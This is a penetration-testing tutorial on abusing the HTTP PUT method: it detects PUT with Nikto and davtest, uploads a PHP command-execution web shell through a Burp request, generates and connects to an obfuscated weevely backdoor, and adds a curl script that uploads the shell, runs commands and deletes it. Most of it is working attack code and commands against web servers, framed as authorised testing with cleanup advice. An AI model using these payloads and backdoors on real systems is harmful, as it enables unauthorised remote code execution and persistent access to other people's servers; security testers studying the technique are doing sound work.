Run Nikto against the target:
nikto -h <target ip> -p <target port>
If the output contains this line:
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
you are potentially in business: the server accepts PUT, so you may be able to write files into the web root. A listed PUT only proves the server accepts the method; whether it executes what you upload (PHP, ASP, JSP) still has to be confirmed, which is what davtest is for.
davtest uploads a test file of every type it knows (txt, php, asp, jsp, ...) and reports which ones the server executes; with -sendbd auto it drops a backdoor for each type that ran, and -cleanup deletes everything it uploaded when it is done:
davtest -url "http://${TARGET_IP}:${TARGET_PORT}" -sendbd auto -cleanup
Capture a request in Burp and send it to Repeater. Change the method to PUT, set the path to the file you want to create, strip the conditional headers the browser added (If-Modified-Since, If-None-Match: a stale ETag on a PUT can earn you a 412), and put the PHP in the body after the blank line that ends the headers. Burp recalculates Content-Length when you edit the body; if you hand-type the request elsewhere, the value must match the body exactly. It should look roughly like this:
PUT /test.php HTTP/1.1
Host: <target ip>:<target port>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:45.0) Gecko/20100101 Firefox/45.0
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0
Content-Length: 33

<?php
echo exec($_GET['cmd']);
?>
The array key is quoted: a bare $_GET[cmd] relies on PHP treating the undefined constant cmd as the string "cmd", which PHP 8 no longer does. Note that exec() returns only the last line of output; swap in shell_exec() if you want everything a command prints.
If the upload landed (expect 201 Created or 204 No Content) and the server executes .php, you can run commands on the underlying system:
CMD=whoami
curl "http://${TARGET_IP}:${TARGET_PORT}/test.php?cmd=${CMD}"
Commands containing spaces or shell metacharacters must be URL-encoded before they go in the query string, otherwise the server (or your shell) mangles them.
The same thing without Burp: install the Poster add-on for Firefox. Poster is a legacy add-on that modern Firefox builds no longer load; if it is not available, curl -T performs an identical PUT from the command line.
Next, generate a backdoor with weevely (an obfuscated PHP agent that only answers to the given password):
BACKDOOR_PW='evil'
BACKDOOR_PATH='/root/back.php'
weevely generate "${BACKDOOR_PW}" "${BACKDOOR_PATH}"
Upload this shell using the PUT method in Poster by setting the following fields:
URL: http://<target ip>:<target port>/back.php
File: /root/back.php
and then clicking the PUT button. A 201 or 204 response means the file was written.
Now connect to the backdoor with the password you generated it with:
weevely "http://${TARGET_IP}:${TARGET_PORT}/back.php" "${BACKDOOR_PW}"
Once you're done, delete the backdoor using the DELETE method in Poster (select DELETE in the method dropdown and click the green button), then confirm with a GET that the path now returns 404. Leaving an unauthenticated or password-only web shell on a client's server is the kind of thing that ends engagements.
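The whole PUT workflow above (check for PUT, upload a shell, run a command, delete it) as a curl script, added here as an example and not code from the original page or from the davtest/weevely/Poster projects. It assumes TARGET_IP and TARGET_PORT are exported by the caller and point at a lab box you are authorised to test, and it reuses the test.php file name and cmd parameter from the Repeater example. The first two functions need no network at all: one builds the raw PUT request you would paste into Repeater with a Content-Length that actually matches the body, the other percent-encodes a command so spaces and semicolons survive the query string. Nothing contacts the target unless the script is run with the argument probe.

```shell
#!/bin/sh
# Added example (not from the original page). Assumptions: TARGET_IP and
# TARGET_PORT are exported by the caller; test.php / cmd match the Repeater
# example above; the target is a lab box you are authorised to test.
# Run as:  sh put_shell.sh probe      (no argument => nothing touches the network)

# Build the raw PUT request you would paste into Repeater. Burp fixes up
# Content-Length for you; a hand-typed request must get it right, so compute it.
build_put_request() {
  # $1 = host:port, $2 = path, $3 = body
  len=$(printf '%s' "$3" | wc -c | tr -d ' ')
  printf 'PUT %s HTTP/1.1\r\nHost: %s\r\nContent-Length: %s\r\nConnection: close\r\n\r\n%s' \
    "$2" "$1" "$len" "$3"
}

# Percent-encode every byte of a command so spaces, ';', '|' and '&' reach the
# web shell intact. Over-encoding unreserved characters is harmless and keeps
# this POSIX-only (od/tr/sed instead of bash string slicing).
urlencode() {
  printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

# Does the server list PUT in the Allow header of an OPTIONS response?
# Absence is not proof of anything: servers can accept PUT without advertising
# it, which is why Nikto and davtest are still worth running.
put_allowed() {
  curl -s -i -X OPTIONS "$1" | grep -i '^Allow:' | grep -qi 'PUT'
}

# Upload a local file as the request body. curl -T sends it with PUT, the same
# request Poster's PUT button or the Repeater example produces. Prints the
# HTTP status code; 201 Created or 204 No Content means the file landed.
put_file() {
  # $1 = URL of the file to create, $2 = local file
  curl -s -o /dev/null -w '%{http_code}' -T "$2" "$1"
}

# Execute a command through the uploaded shell.
run_cmd() {
  # $1 = shell URL, $2 = command
  curl -s "$1?cmd=$(urlencode "$2")"
}

# Remove the uploaded file again; this is the request Poster's DELETE button sends.
delete_file() {
  curl -s -o /dev/null -w '%{http_code}' -X DELETE "$1"
}

if [ "${1:-}" = "probe" ]; then
  base="http://${TARGET_IP}:${TARGET_PORT}"
  shell="$base/test.php"
  put_allowed "$base/" && echo "[+] OPTIONS lists PUT"
  # Same payload as the Repeater example, written to a temp file for curl -T.
  printf '%s\n' "<?php echo exec(\$_GET['cmd']); ?>" > /tmp/test.php
  echo "[*] PUT    -> HTTP $(put_file "$shell" /tmp/test.php)"
  echo "[*] whoami -> $(run_cmd "$shell" 'whoami')"
  echo "[*] DELETE -> HTTP $(delete_file "$shell")"
  rm -f /tmp/test.php
fi
```

If put_file returns 201 but run_cmd comes back with the PHP source instead of a username, the server accepts PUT but does not execute .php; that is exactly the case davtest's per-extension report is meant to surface, and a .phtml or .php5 upload is the next thing to try. The DELETE at the end is not optional on a client engagement.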
Resources: